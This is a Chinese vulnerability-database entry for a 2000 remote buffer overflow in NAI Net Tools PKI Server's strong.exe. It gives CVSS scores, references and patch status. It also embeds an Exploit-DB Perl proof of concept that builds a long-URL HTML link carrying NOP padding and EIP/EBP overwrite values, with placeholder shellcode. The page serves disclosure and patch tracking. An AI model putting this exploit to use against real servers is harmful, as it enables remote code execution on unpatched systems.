发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:46

[原文]Buffer overflow in strong.exe program in NAI Net Tools PKI server 1.0 before HotFix 3 allows remote attackers to execute arbitrary commands via a long URL in the HTTPS port.

[CNNVD]NAI Net Tools PKI server strong.exe命令执行漏洞(CNNVD-200010-021)

        NAI Net Tools PKI server 1.0 HotFix 3之前版本的strong.exe存在缓冲区溢出漏洞。远程攻击者可以借助HTTPS端口的超长URL执行任意命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000802 NAI Net Tools PKI Server vulnerabilities
(UNKNOWN)  XF  nai-nettools-strong-bo(5026)

- 漏洞信息

NAI Net Tools PKI server strong.exe命令执行漏洞
中危 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00
        NAI Net Tools PKI server 1.0 HotFix 3之前版本的strong.exe存在缓冲区溢出漏洞。远程攻击者可以借助HTTPS端口的超长URL执行任意命令。

- 公告与补丁


- 漏洞信息 (20134)

NAI Net Tools PKI Server 1.0 strong.exe Buffer Overflow Vulnerability (EDBID:20134)
windows remote
2000-08-02 Verified
0 juliano
N/A [点击下载]

Certain versions of Network Associates Inc.'s Net Tools PKI (Public Key Infrastructure) server ship with a buffer overflow vulnerability which could lead to a remote compromise of the system running the PKI server. The problem lies within the webserver component of the PKI server (strong.exe) which operates several 'virtual servers' required to operate the PKI server. The first is the Administrative Web Server which listens via TCP port 443, the second is Enrollment Web Server which listens on TCP port 444. Unlike the Administrative Web Server the Enrollment Web Server does not require credentials to be exchanged before a user can talk to the webserver. It is via this virtual server that an attacker can exploit the problem at hand.

In particular this problem is located in the PKI servers log generation routines. In order to exploit it, a user must simply connect via an HTTPS connection to port 444 and provide an overly long URL (2965 + characters) which will be mishandled by the log routines resulting in a buffer overflow. 

# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port an create the html file:
#./ > test.html
#Open the html in a SSL compatible browser and click on the link. puf!
#Juliano Rizzo (c) 2000

$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";

#We can set the values of EIP and EBP, our code is on the stack
#and in 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL readed from socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
"\">Click here to exploit.!</a></body></html>";

- 漏洞信息

NAI Net Tools PKI Server strong.exe Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Unknown Third-party Verified

- 漏洞描述

A remote overflow exists in Net Tools PKI Server. The "strong.exe" program fails to sanitize input resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2000-08-02 Unknow
2000-08-02 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Network Associates has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者